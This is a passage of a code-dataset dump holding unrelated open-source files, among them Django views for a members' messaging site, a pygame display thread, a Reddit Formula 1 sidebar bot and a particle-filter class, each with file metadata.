'Hierarchy': {'title': _('Hierarchy'),\n 'toggle': False},\n 'StockItemID': {'title': _('Stock item ID'),\n 'toggle': True},\n 'IsOccupied': {'title': _('Is Occupied'),\n 'toggle': False},\n }\n self.review_states = [\n {'id':'default',\n 'title': _('Active'),\n 'contentFilter': {'inactive_state': 'active'},\n 'transitions': [{'id':'deactivate'}, ],\n 'columns': ['Title',\n 'Description',\n 'Hierarchy',\n 'StockItemID',\n 'IsOccupied']},\n {'id':'inactive',\n 'title': _('Dormant'),\n 'contentFilter': {'inactive_state': 'inactive'},\n 'transitions': [{'id':'activate'}, ],\n 'columns': ['Title',\n 'Description',\n 'Hierarchy',\n 'StockItemID',\n 'IsOccupied']},\n {'id':'all',\n 'title': _('All'),\n 'contentFilter':{},\n 'columns': ['Title',\n 'Description',\n 'Hierarchy',\n 'StockItemID',\n 'IsOccupied']},\n ]\n\n def folderitems(self):\n items = BikaListingView.folderitems(self)\n for x in range(len(items)):\n if not items[x].has_key('obj'): continue\n obj = items[x]['obj']\n items[x]['replace']['Title'] = \"%s\" % \\\n (items[x]['url'], items[x]['Title'])\n items[x]['StockItemID'] = obj.getStockItemID()\n items[x]['IsOccupied'] = 'yes' if obj.getIsOccupied() else 'no'\n items[x]['Hierarchy'] = obj.getHierarchy()\n return items\n\n\nclass AddStorageLevelView(BrowserView):\n \"\"\" Handler for the \"Add Storage levels\" button in Storage levels\n view.\n \"\"\"\n\n def StorageLevelTitleExists(self, title):\n catalog = getToolByName(self.context, 'bika_setup_catalog')\n #XXX ParentUID should be queried instead of looping\n for item in catalog(portal_type='StorageLevel', title=title):\n if item.getObject().getParentUID() == self.context.UID():\n return True\n return False\n\n def RepresentsInt(self, string):\n try:\n int(string)\n return True\n except ValueError:\n return False\n\n def __call__(self):\n form = self.request.form\n title = self.request.get('storagelevel-title', '')\n sequencestart = self.request.get('storagelevel-sequencestart', '')\n number = self.request.get('storagelevel-number', '')\n\n if not title and not number:\n message = ('error', ('Either the storage level title or the number '\n 'of items should be specified.'))\n elif number and (not self.RepresentsInt(number) or int(number) < 1):\n message = ('error', 'Number of items should be a positive integer.')\n elif sequencestart and (not self.RepresentsInt(sequencestart) or\n int(sequencestart) < 0):\n message = ('error', 'Sequence start should be non-negative integer.')\n else:\n separator = title and number and \\\n self.context.bika_setup.getStorageLevelTitleSeparator() or ''\n sequencestart = sequencestart and int(sequencestart) or 1\n number = number and int(number) or 1\n\n for index in range(number):\n sequenced_index = number is not 1 and str(sequencestart+index) or ''\n indexed_title = title + separator + sequenced_index\n\n if self.StorageLevelTitleExists(indexed_title):\n title_exists_message = True\n message = _('Some titles already exist. '\n 'Those were not created to maintain the '\n 'uniqueness of titles.')\n self.context.plone_utils.addPortalMessage(message, 'warning')\n continue\n sl = _createObjectByType('StorageLevel', self.context, tmpID())\n sl.setTitle(indexed_title)\n sl.processForm()\n message = ('info', 'Changes saved.')\n self.context.plone_utils.addPortalMessage(_(message[1]), message[0])\n self.request.RESPONSE.redirect(self.context.absolute_url())\n return\n\n\nschema = ATFolderSchema.copy()\nclass StorageLevels(ATFolder):\n implements(IStorageLevels)\n displayContentsTab = False\n schema = schema\n\nschemata.finalizeATCTSchema(schema, folderish = True, moveDiscussion = False)\natapi.registerType(StorageLevels, PROJECTNAME)\n","sub_path":"bika/lims/controlpanel/bika_storagelevels.py","file_name":"bika_storagelevels.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"241066789","text":"from django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'coding.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^$', views.kappa),\n url(r'^input.html$', views.input),\n url(r'^newinput$', views.newinput),\n url(r'^analyze$', views.analyze),\n]\n","sub_path":"kappa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"4676420","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 24 10:24:38 2018\n\n@author: Vidyaa\n\"\"\"\n\n# There is something small that needs fixing. Can you spot it and fix it? (Hint, we only want A-Z and a-z)\n\nfor i in range(65,65+26*2+6):\n\tif ord(chr(i)) <= 90 or ord(chr(i)) >= 97:\n\t\tprint(i, \"equivalent to \",chr(i))\n\n# Make a function that prints A-Z and a-z\n\ndef alphabet():\n\tfor i in range(65,65+26*2+6):\n\t\tif ord(chr(i)) <= 90 or ord(chr(i)) >= 97:\n\t\t\tprint(i, \"equivalent to \",chr(i))\n\n\nalphabet()\n\n\n# Make a function that asks the user for a message, and turns it into a list of numbers. (It's a cypher ;)) \nLetter = [] \n\ndef cypher(message):\n\tfor letter in message:\n\t\tLetter.append(ord(letter))\n\treturn Letter\n\nmessage = input(\"Enter your secret message:\")\nLetter = cypher(message)\nprint(\"Its a SECRET WOO HOO... \", Letter)\n\n\n# Optional: Write a function that does a ceaser cypher (Google), ask the user a number, and shift their message by that number.\n\nLetter = [] \n\ndef cypher(message,rot):\n\n\tfor letter in message:\n\t\tif rot.lower() == 'left':\n\t\t\tLetter.append(ord(letter) - 3)\n\t\telif rot.lower() == 'right':\n\t\t\tLetter.append(ord(letter) + 3)\n\treturn Letter\n\nmessage = input(\"Enter your secret message: \")\nrot = input(\"Rotate left or right: \")\nLetter = cypher(message, rot)\nprint(\"Its a CEASER SECRET HAAH HAAH HAA... \", Letter)\n","sub_path":"Week 2/Week2_Day2_HW.py","file_name":"Week2_Day2_HW.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"534672929","text":"import threading\nimport pygame\nimport Queue\nimport os\nfrom textwrap import *\nfrom pygame import time\n\nSLIDE = '__SLIDE__'\n\nimport settings\nif settings.CAMERA:\n\tfrom pygame import camera\n\nclass Video(threading.Thread):\n\tdef __init__(self, logger, queue, parent_queue):\n\t\tthreading.Thread.__init__(self)\n\t\tself.logger = logger\n\t\tself.logger.debug(\"Creating video...\")\n\t\tself.queue = queue\n\t\tself.parent_queue = parent_queue\n\t\tself.is_slide = False\n\t\tself.slide = None\n\n\t\tself.text = \"Welcome!\"\n\n\t\t# Setup screen\n\t\tpygame.init()\n\t\tself.clock = time.Clock();\n\t\tpygame.mouse.set_visible(False)\n\t\tself.width = settings.SCREEN_WIDTH\n\t\tself.height = settings.SCREEN_HEIGHT\n\t\tflags = 0 #pygame.DOUBLEBUF | pygame.HWSURFACE | pygame.FULLSCREEN\n\t\tself.screen = pygame.display.set_mode((self.width, self.height), flags)\n\t\tfont_size = settings.FONT_SIZE\n\t\tself.font = pygame.font.SysFont(settings.FONT, font_size, bold=1)\n\n\n\t\tif settings.CAMERA:\n\t\t\tcamera.init()\n\t\t\tcamera_size = (640,480)\n\t\t\tself.c = camera.Camera('/dev/video0', camera_size)\n\t\t\tself.c.start()\n\t\t\tself.surface = pygame.Surface(camera_size)\n\t\tself.bigSurface = None\n\t\tself.alert = False\n\n\t\tself.foregroundColor = pygame.Color(settings.FONT_COLOR)\n\t\tself.backgroundColor = pygame.Color(settings.BACKGROUND_COLOR)\n\t\tself.black = pygame.Color(0, 0, 0, 100)\n\t\tself.shadowShade = 0\n\n\t\tself.background_image = None\n\t\tif settings.BACKGROUND_IMAGE:\n\t\t\tself.background_image = pygame.image.load(settings.BACKGROUND_IMAGE)\n\t\tself.logger.debug(\"Video created\")\n\n\tdef blit_background(self):\n\t\tif not self.alert:\n\t\t\tif settings.CAMERA:\n\t\t\t\tif self.c.query_image():\n\t\t\t\t\tself.c.get_image(self.surface)\n\t\t\t\t\tself.surface = pygame.transform.flip(self.surface, True, False)\n\t\t\t\t\tself.bigSurface = pygame.transform.scale(self.surface, (self.width, self.height))\n\t\t\telse:\n\t\t\t\tself.bigSurface = pygame.Surface((self.width, self.height))\n\t\t\t\tself.bigSurface.fill(self.backgroundColor)\n\n\t\tif self.bigSurface != None:\n\t\t\tself.screen.blit(self.bigSurface, (0,0))\n\n\t\tif self.background_image:\n\t\t\tself.screen.blit(self.background_image, (0,0))\n\n\t\tif self.is_slide:\n\t\t\tself.screen.blit(self.slide, (0,0))\n\t\t\n\tdef truncline(self, text, font, maxwidth):\n\t\t\"\"\"Truncates a single line of text to given pixel size.\"\"\"\n\t\treal=len(text)\n\t\tstext=text\n\t\tl=font.size(text)[0]\n\t\ta=0\n\t\tdone=1\n\t\twhile l > maxwidth: \n\t\t\ta=a+1\n\t\t\tstext=text.rsplit(None, a)[0]\n\t\t\tl=font.size(stext)[0]\n\t\t\treal=len(stext)\n\t\t\tdone=0\n\t\treturn real, done, stext\n\t\t\t\n\tdef wrapline(self, text, font, maxwidth):\n\t\t\"\"\"Wraps text line by word by word into multiple lines to fit given pixel size.\"\"\"\n\t\tdone=0\n\t\twrapped=[]\n\t\t\n\t\twhile not done: \n\t\t\tnl, done, stext=self.truncline(text, font, maxwidth)\n\t\t\twrapped.append(stext.strip())\n\t\t\ttext=text[nl:]\n\t\treturn wrapped\n\n\tdef run(self):\n\t\twhile True:\n\t\t\t# Set frame rate\n\t\t\tself.clock.tick(30)\n\t\t\ttry:\n\t\t\t\ttry:\n\t\t\t\t\tmsg = self.queue.get_nowait()\n\t\t\t\t\tpriority = msg[0]\n\t\t\t\t\tline1 = msg[1]\n\t\t\t\t\tline2 = msg[2]\n\t\t\t\t\tself.is_slide = line2 == SLIDE\n\t\t\t\t\tif self.is_slide:\n\t\t\t\t\t\tfilename = line1\n\t\t\t\t\t\tself.slide = pygame.image.load(filename)\n\n\t\t\t\t\tself.alert = msg[3]\n\t\t\t\t\tself.text = line1 + ' ' + line2\n\t\t\t\t\tself.queue.task_done()\n\t\t\t\t\tt0 = time.get_ticks()\n\t\t\t\texcept Queue.Empty:\n\t\t\t\t\tFalse\n\t\t\t\t\t#self.logger.debug(\"Video queue empty\")\n\n\t\t\t\tself.blit_background()\n\n\t\t\t\tif not self.is_slide and self.text != None:\n\t\t\t\t\twrapped_text = self.wrapline(self.text, self.font, self.width)\n\t\t\t\t\t# center text vertically\n\t\t\t\t\tstart_y = (self.height - (len(wrapped_text) * self.font.get_linesize())) / 2 \n\t\t\t\t\tif self.alert:\n\t\t\t\t\t\tif settings.TEXT_EFFECT == 'blink':\n\t\t\t\t\t\t\tfor index, line in enumerate(wrapped_text):\n\t\t\t\t\t\t\t\ttextSurface = self.font.render(line, True, self.foregroundColor)\n\t\t\t\t\t\t\t\tself.shadowShade = (self.shadowShade + 3) % 255\n\t\t\t\t\t\t\t\tshadowColor = pygame.Color(self.shadowShade, self.shadowShade, self.shadowShade)\n\t\t\t\t\t\t\t\tshadow = self.font.render(line, True, shadowColor)\n\t\t\t\t\t\t\t\tpos = (1, start_y + index * self.font.get_linesize())\n\t\t\t\t\t\t\t\tshadowOffset = 3\n\t\t\t\t\t\t\t\tself.screen.blit(shadow, (pos[0]+shadowOffset, pos[1]+shadowOffset))\n\t\t\t\t\t\t\t\tself.screen.blit(textSurface, pos)\n\t\t\t\t\t\telif settings.TEXT_EFFECT == 'type':\n\t\t\t\t\t\t\tt0 = time.get_ticks()\n\t\t\t\t\t\t\tself.blit_background()\n\t\t\t\t\t\t\tfor index, line in enumerate(wrapped_text):\n\t\t\t\t\t\t\t\tfor caret in range(len(line)):\n\t\t\t\t\t\t\t\t\tcurrent_part = line[0:caret+1]\n\t\t\t\t\t\t\t\t\ttextSurface = self.font.render(current_part, True, self.foregroundColor)\n\t\t\t\t\t\t\t\t\tshadowColor = self.black\n\t\t\t\t\t\t\t\t\tshadow = self.font.render(current_part, True, shadowColor)\n\t\t\t\t\t\t\t\t\tpos = (1, start_y + index * self.font.get_linesize())\n\t\t\t\t\t\t\t\t\tshadowOffset = 3\n\t\t\t\t\t\t\t\t\tself.screen.blit(shadow, (pos[0]+shadowOffset, pos[1]+shadowOffset))\n\t\t\t\t\t\t\t\t\tself.screen.blit(textSurface, pos)\n\t\t\t\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\t\t\t\t\ttime.wait(80)\t\t\t\t\t\t\n\t\t\t\t\t\t\twhile(t0 + settings.ALERT_DISPLAY_TIME*1000 - time.get_ticks() > 0):\n\t\t\t\t\t\t\t\t# keep the display updated while we wait\n\t\t\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\t\t\t\tself.clock.tick(30)\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor index, line in enumerate(wrapped_text):\n\t\t\t\t\t\t\ttextSurface = self.font.render(line, True, self.foregroundColor)\n\t\t\t\t\t\t\twidth = textSurface.get_width()\n\t\t\t\t\t\t\tshadowColor = self.black\n\t\t\t\t\t\t\tshadow = self.font.render(line, True, shadowColor)\n\t\t\t\t\t\t\tpos = ((self.width - width)/2, start_y + index * self.font.get_linesize())\n\t\t\t\t\t\t\tshadowOffset = 3\n\t\t\t\t\t\t\tself.screen.blit(shadow, (pos[0]+shadowOffset, pos[1]+shadowOffset))\n\t\t\t\t\t\t\tself.screen.blit(textSurface, pos)\n\n\n\t\t\t\tpygame.display.update()\n\t\t\t\t\n\t\t\t\tfor event in pygame.event.get():\n\t\t\t\t\tif event.type == pygame.QUIT or event.type == pygame.KEYDOWN and event.key ==pygame.K_q:\n\t\t\t\t\t\tself.logger.info(\"EXIT\")\n\t\t\t\t\t\tpygame.quit()\n\t\t\t\t\t\tos._exit(0)\n\t\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\t\tif event.key == pygame.K_t:\n\t\t\t\t\t\t\tmsg = [1, settings.FAKE_TWEET, \"\", True]\n\t\t\t\t\t\t\tself.parent_queue.put(msg)\n\t\t\texcept Exception as e:\n\t\t\t\tself.logger.exception(\"Exception in video: \" + str(e))\n\n","sub_path":"video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"191252764","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0002_auto_20151113_1113'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='group',\n name='court',\n field=models.ForeignKey(null=True, related_name='groups', blank=True, to='api.Court'),\n ),\n ]\n","sub_path":"api/migrations/0003_auto_20151113_1246.py","file_name":"0003_auto_20151113_1246.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"213042115","text":"\"\"\"\nbyceps.metrics.application\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThis allows to provide the metrics in a separate application. This might\nbe desired for performance and/or security reasons.\n\nRun like this (inside a virtual environment)::\n\n $ DATABASE_URI=your-database-uri-here FLASK_APP=app_metrics flask run --port 8090\n\nMetrics then become available at `http://127.0.0.1/metrics`.\n\n:Copyright: 2014-2023 Jochen Kupperschmidt\n:License: Revised BSD (see `LICENSE` file for details)\n\"\"\"\n\nfrom flask import Flask\n\nfrom byceps.database import db\nfrom byceps.util.framework.blueprint import get_blueprint\n\n\ndef create_metrics_app(database_uri):\n \"\"\"Create the actual Flask application.\"\"\"\n app = Flask(__name__)\n\n app.config['SQLALCHEMY_DATABASE_URI'] = database_uri\n\n # Initialize database.\n db.init_app(app)\n\n blueprint = get_blueprint('monitoring.metrics')\n app.register_blueprint(blueprint, url_prefix='/metrics')\n\n return app\n","sub_path":"byceps/metrics/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"236736290","text":"from collections import OrderedDict\nfrom os import path\n\nimport datetime\nimport HTMLParser\nimport json\nimport mysql.connector\nimport OAuth2Util\nimport praw\nimport re\n\ndef main():\n # Read configuration files\n dir = path.dirname(__file__)\n\n config_data = open(path.join(dir, \"config.json\"), \"r\")\n config = json.load(config_data)\n config_data.close()\n\n sessions_data = open(path.join(dir, \"schedule.json\"), \"r\")\n sessions = json.load(sessions_data, object_pairs_hook=OrderedDict)\n sessions_data.close()\n\n # Reddit login\n r = praw.Reddit(config['reddit']['user_agent'])\n o = OAuth2Util.OAuth2Util(r)\n o.refresh(force=True)\n\n if (\"mysql\" in config):\n # Connect to MySQL database\n cnx = mysql.connector.connect(\n user=config['mysql']['username'].encode(),\n password=config['mysql']['password'].encode(),\n host=config['mysql']['host'].encode(),\n database=config['mysql']['database'].encode(),\n buffered=True,\n collation='utf8_swedish_ci',\n charset='utf8'\n )\n\n postScheduledPosts(cnx, r)\n\n # Close the MySQL connection\n cnx.close()\n\n # Update the sidebar\n h = HTMLParser.HTMLParser()\n current_sidebar = r.get_subreddit(config['reddit']['subreddit']).get_settings()[\"description\"]\n current_sidebar = h.unescape(current_sidebar)\n new_sidebar = current_sidebar\n\n new_sidebar = setTag(\"countdown\", getCountdownTime(sessions), new_sidebar)\n r.get_subreddit(config['reddit']['subreddit']).update_settings(description=new_sidebar)\n\n# Take a sidebar, find [](/f1bot-keyword-s)<*>[](/f1bot-keyword-e), replace with\n# [](/f1bot-keyword-s)[](/f1bot-keyword-e), return updated sidebar\ndef setTag(keyword, content, sidebar):\n p = re.compile('\\[\\]\\(\\/f1bot-'+keyword+'-s\\)(.*)\\[\\]\\(\\/f1bot-'+keyword+'-e\\)', re.IGNORECASE)\n\n if p.search(sidebar):\n for match in p.finditer(sidebar):\n sidebar = sidebar.replace(match.group(0), '[](/f1bot-'+keyword+'-s)'+content+' [](/f1bot-'+keyword+'-e)')\n return sidebar\n\n# Take session data, figure out what the next session is and return a formatted\n# string saying how much time is left until that session begins. If the session\n# is in progress, return a string stating that.\ndef getCountdownTime(sessions):\n lengths = {\n 'Practice 1': 90,\n 'Practice 2': 90,\n 'Practice 3': 60,\n 'Qualifying': 90,\n 'Race': 120\n }\n for event in sessions['2015']:\n for (session, time) in event['times'].items():\n sessiontime = datetime.datetime.strptime(time, '%Y-%m-%d %H:%M')\n sessionlength = datetime.timedelta(0, lengths[session]*60)\n timeleft = sessiontime - datetime.datetime.now()\n\n # If the event time hasn't passed\n if timeleft > datetime.timedelta():\n d = datetime.datetime(1,1,1) + timeleft\n if (timeleft < datetime.timedelta(hours=1)):\n return (\"**%s**: %dM\" % (session, d.minute))\n elif (timeleft < datetime.timedelta(hours=7)):\n return (\"**%s**: %dH %dM\" % (session, d.hour, d.minute))\n elif (timeleft < datetime.timedelta(days=7)):\n return (\"**%s**: %dD %dH\" % (session, d.day-1, d.hour))\n else:\n return (\"**%s**: %dD\" % (session, d.day-1))\n\n # If the event time has passed but the event isn't over\n if (timeleft + sessionlength) > datetime.timedelta():\n return (\"**%s**: Live!\" % (session))\n\n return \"\"\n\n# Take a database connection and a reddit login, figure out if there are rows in the f1_bot table that have a\n# scheduled time in the past and submit those posts to reddit according to the information in the table. If\n# the logged in user has moderator powers, distinguish, add flair, sticky and post a comment.\ndef postScheduledPosts(cnx, reddit):\n # Search for rows where the difference between schedule and now is less than 3 hours\n cursor = cnx.cursor()\n updateCursor = cnx.cursor()\n fetch_query = (\"SELECT id, subreddit, title, text, flair_text, flair_css FROM f1_bot WHERE (TIME_TO_SEC(TIMEDIFF(schedule, NOW())) < 300) AND (posted = 0)\")\n update_query = (\"UPDATE f1_bot SET posted=1 WHERE id=%(post_id)s\")\n cursor.execute(fetch_query)\n\n if (cursor.rowcount > 0):\n for (post_id, subreddit, title, text, flair_text, flair_css) in cursor:\n s = reddit.submit(subreddit, title, text=text)\n updateCursor.execute(update_query, {'post_id': post_id})\n cnx.commit()\n\n moderators = reddit.get_subreddit(subreddit).get_moderators()\n if any(x for x in moderators if x.name == reddit.user.name):\n s.set_flair(flair_text=flair_text, flair_css_class=flair_css)\n s.distinguish()\n s.sticky()\n s.add_comment('Please post streams and stream requests as a reply to this comment.')\n\n cursor.close()\n updateCursor.close()\n\nif __name__ == \"__main__\": main()\n","sub_path":"f1-bot.py","file_name":"f1-bot.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"100231506","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse, Http404\nfrom django.db import connection\nfrom django.shortcuts import get_object_or_404, render\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.views.decorators.csrf import ensure_csrf_cookie\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import Template, Context, loader\nimport datetime\n@ensure_csrf_cookie\n\n\n\n\n@login_required(redirect_field_name='')\ndef forside(request):\n\n\t\twith connection.cursor() as c:\n\t\t\tif request.method == 'GET':\n\t\t\t\tc.execute(\"select id from auth_user\")\n\t\t\t\tusercount = len(c.fetchall())\n\n\t\treturn render(request, 'homepage/index.html', {\n\t\t\t\t'user_first_name': request.user.first_name,\n\t\t\t\t'user_last_name': request.user.last_name,\n\t\t\t\t'usercount' : usercount\n\t\t\t\t} )\n\n@login_required(redirect_field_name='')\ndef beskeder(request):\n\n\tif request.method == \"GET\":\n\t\twith connection.cursor() as c:\n\n\t\t\tc.execute(\"select id from auth_user\")\n\t\t\tusercount = len(c.fetchall())\n\n\t\t\tc.execute(\"select id from messages\")\n\t\t\tmessage = len(c.fetchall())\n\n\t\t\tc.execute(\"select messages.id, messages.sid, messages.rid, messages.message, messages.time_stamp, auth_user.first_name, c1.first_name from messages join auth_user on messages.sid = auth_user.id join auth_user c1 on messages.rid = c1.id ORDER BY time_stamp ASC\")\n\t\t\tdata = c.fetchall()\n\n\t\t\tc.execute(\"select * from auth_user\")\n\t\t\tdropdown = c.fetchall()\n\n\t\t\treturn render(request, 'homepage/beskeder.html', {\n\t\t\t\t\t'user_first_name': request.user.first_name,\n\t\t\t\t\t'user_last_name': request.user.last_name,\n\t\t\t\t\t'usercount' : usercount,\n\t\t\t\t\t'message' : message,\n\t\t\t\t\t'data' : data,\n\t\t\t\t\t'dropdown' : dropdown,\n\t\t\t\t\t} )\n\n\tif request.method == \"POST\":\n\t\twith connection.cursor() as c:\n\n\t\t\tsenderID = request.user.id # Får senderens ID.\n\t\t\t#\n\t\t\tmessagesent = request.form[\"message\"] # Får indtastede besked.\n\t\t\t#\n\t\t\treciever = request.form[\"reciever\"] # Får modtagerens ID\n\t\t\t#\n\t\t\tc.execute(\"select id from messages\")\n\t\t\t#\n\t\t\tmid = (len(c.fetchall()) + 1)\t# Får antallet af beskeder og plusser med 1.\n\t\t\t#\n\t\t\t# # Vi behøver ikke give nogle date, da den selv sætter ind!\n\t\t\tc.execute(\"insert into messages(id, sid, rid, message) values (%s, %s, %s, %s)\", [mid, senderID, reciever, messagesent])\n\t\t\tconnection.commit()\n\t\t\treturn redirect('/')\n\n\n\n\n\n@login_required(redirect_field_name='')\ndef traeningsprogrammer(request):\n\n\t\twith connection.cursor() as c:\n\t\t\tif request.method == 'GET':\n\t\t\t\tc.execute(\"select id from auth_user\")\n\t\t\t\tusercount = len(c.fetchall())\n\n\t\treturn render(request, 'homepage/traeningsprogrammer.html', {\n\t\t\t\t'user_first_name': request.user.first_name,\n\t\t\t\t'user_last_name': request.user.last_name,\n\t\t\t\t'usercount' : usercount\n\t\t\t\t} )\n\n@login_required(redirect_field_name='')\ndef medlemmer(request):\n\n\t\twith connection.cursor() as c:\n\t\t\tif request.method == 'GET':\n\t\t\t\tc.execute(\"select id from auth_user\")\n\t\t\t\tusercount = len(c.fetchall())\n\n\t\t\t\tc.execute(\"select first_name , last_name from auth_user\")\n\t\t\t\tallusernames = c.fetchall()\n\n\t\t\treturn render(request, 'homepage/medlemmer.html', {\n\t\t\t\t\t'user_first_name': request.user.first_name,\n\t\t\t\t\t'user_last_name': request.user.last_name,\n\t\t\t\t\t'usercount' : usercount,\n\t\t\t\t\t'allusernames' : allusernames,\n\t\t\t\t\t} )\n","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"292857427","text":"import os\nimport subprocess\n\nif __name__ == \"__main__\":\n # root_dir = r'D:\\workspace\\stockopr'\n # py = str(os.path.join(root_dir, 'venv', 'Scripts', 'python.exe'))\n root_dir = os.getenv('HOME') + '/workspace/stockopr'\n py = str(os.path.join(root_dir, 'venv', 'bin', 'python'))\n\n script = 'console.py'\n script_path = os.path.join(root_dir, script)\n print(py, script_path)\n print(os.path.exists(py), os.path.exists(script_path))\n\n os.environ['PYTHONPATH'] = root_dir\n # subprocess.Popen([py, script_path], creationflags=subprocess.DETACHED_PROCESS, cwd=root_dir)\n subprocess.Popen([py, script_path], cwd=root_dir)\n","sub_path":"toolkit/initenv/run_stockopr_console.py","file_name":"run_stockopr_console.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"442650944","text":"import random\n\nimport numpy as np\nfrom common.Particle import Particle\nfrom common.ToolBox import distance_to_obstacle,update_coord_according_scale\nimport math\n\n\n\nclass Particle_Filter:\n\n NB_PARTICLES=200\n FIXED_PLANE_Y = 100\n increment = 0\n DISTANCE_ERROR = 2\n\n width=0\n height=0\n\n MOTION_PLANNER_MIN=-1\n MOTION_PLANNER_MAX=5\n\n SCALE_FACTOR=10\n \n obs_grid=[]\n particle_list=[]\n\n\n def __init__(self,width,height,obs_grid):\n self.width=width\n self.height=height\n self.obs_grid=obs_grid\n self.particle_list=self.getRandParticle(self.NB_PARTICLES,0,width,0,self.height)\n\n def resetParticle(self):\n self.particle_list = self.getRandParticle(self.NB_PARTICLES, 0, self.width, self.FIXED_PLANE_Y, self.FIXED_PLANE_Y)\n\n # ----------------------------------------------------------------------------------------------------------------\n # ----------------------------------------- COMPUTED RANDOM PARTICLES--------------------------------------------\n # ----------------------------------------------------------------------------------------------------------------\n def getRandParticle(self,nbr, start_x, max_x, start_y, max_y):\n particle_list = []\n ################################### \n ##### s\n ## nbr: number fo particles\n ## start_x: min x possible coordinate\n ## max_x: max x possible coordinate\n ## start_y: min y possible coordinate\n ## max_y: max y possible coordinate\n #####\n ## Use the Particle object to fill the list particle_list\n ##\n for x in range(nbr):\n particle_list.append(Particle(random.uniform(start_x,max_x),random.uniform(start_y,max_y),0.01,0.01))\n\n return particle_list\n\n # ----------------------------------------------------------------------------------------------------------------\n # ----------------------------------- UPDATE PARTICLE ACCORDING NEX POSE-----------------------------------------\n # ----------------------------------------------------------------------------------------------------------------\n def updateParticle(self,plane_pose, increment_y):\n # process particle according motion planning\n self.particle_list = self.motion_prediction(plane_pose, increment_y)\n\n current_distance_to_obstacle = distance_to_obstacle(plane_pose['x'], plane_pose['y'], self.obs_grid,self.width,self.height,self.SCALE_FACTOR)\n\n self.weightingParticle_list( current_distance_to_obstacle)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # -------------------------------------- MOTION PREDICTION AND RESAMPLING --------------------------------------\n # ----------------------------------------------------------------------------------------------------------------\n def motion_prediction(self, plane_pose, increment_y):\n new_particle_list = []\n choices = {}\n for i in range(len(self.particle_list)):\n choices[self.particle_list[i].id()] = self.particle_list[i].w\n\n ###################################\n ##### TODO\n ## self.particle_list: list of available particles\n ##\n #####\n ## Use the function self.weighted_random_choice(choices) returning\n # coordinate from a particle according a\n ## roulette wheel algorithm\n # Note that weighted_random_choice return a string containing coodinate x and y of the selected particle\n for i in range(len(self.particle_list)):\n coord = self.weighted_random_choice(choices)\n x_coord = int(coord.split('_')[0])\n y_coord = int(coord.split('_')[1])\n x_coord += int(random.gauss(1+self.increment,10))\n \n y_coord = plane_pose['y']\n y_coord += int(random.gauss(increment_y,10))\n\n new_particle_list.append(Particle(x_coord, y_coord,0.01,0.01))\n \n return new_particle_list\n\n # -------------------------------------------------------\n # ----------- SELECT PARTICLE -----------\n # -------------------------------------------------------\n def weighted_random_choice(self,choices):\n ###################################\n ##### TODO\n ## choices: dictionary holding particle coordination as key\n ## and weight as value\n ## return the selected particle key\n #####\n\n id_particle = random.choices(list(choices.keys()), weights = list(choices.values()), k = 1)[0]\n for x in self.particle_list:\n if x.id() == id_particle:\n coord = \"{}_{}\".format(int(x.x),int(x.y))\n \n return coord\n\n # ----------------------------------------------------------------------------------------------------------------\n # --------------------------------------------- EVALUATE PARTICLE (proba) ---------------------------------------\n # ----------------------------------------------------------------------------------------------------------------\n def weightingParticle_list(self,observed_distance):\n sum_weights = 0\n for i in range(len(self.particle_list)):\n #Compute individual particle weight\n current_weight = self.weightingParticle(self.particle_list[i].x, self.particle_list[i].y, observed_distance)\n self.particle_list[i].w = current_weight\n sum_weights += current_weight\n for i in range(len(self.particle_list)):\n if sum_weights != 0:\n #compute proba sucha as weight is normalized\n self.particle_list[i].proba = self.particle_list[i].w / float(sum_weights)\n else:\n self.particle_list[i].proba = 0\n\n\n # -----------------------------------------------------\n # ----------- EVALUATE PARTICLE (Weight) -----------\n # -----------------------------------------------------\n def weightingParticle(self,p_x, p_y, observed_distance):\n ###################################\n ##### TODO\n ## p_x: x coordinate of the particle p\n ## p_y: y coordinate of the particle p\n ## observed_distance: distance to the ground\n ## measure by the probe\n ##\n ## return weight corresponding to the given particle\n ## according observation\n ##\n ## Note ue the function distance_to_obstacle to get the\n ## estimate particle to the ground distance\n particle_height = distance_to_obstacle(p_x, p_y, self.obs_grid, self.width,self.height, self.SCALE_FACTOR)\n\n ##Method 1\n # const = 0.3\n \n # if abs(particle_height-observed_distance) < const:\n # weight = 0.5\n # else:\n # weight = 0.1\n\n #Method 2\n mu = particle_height\n 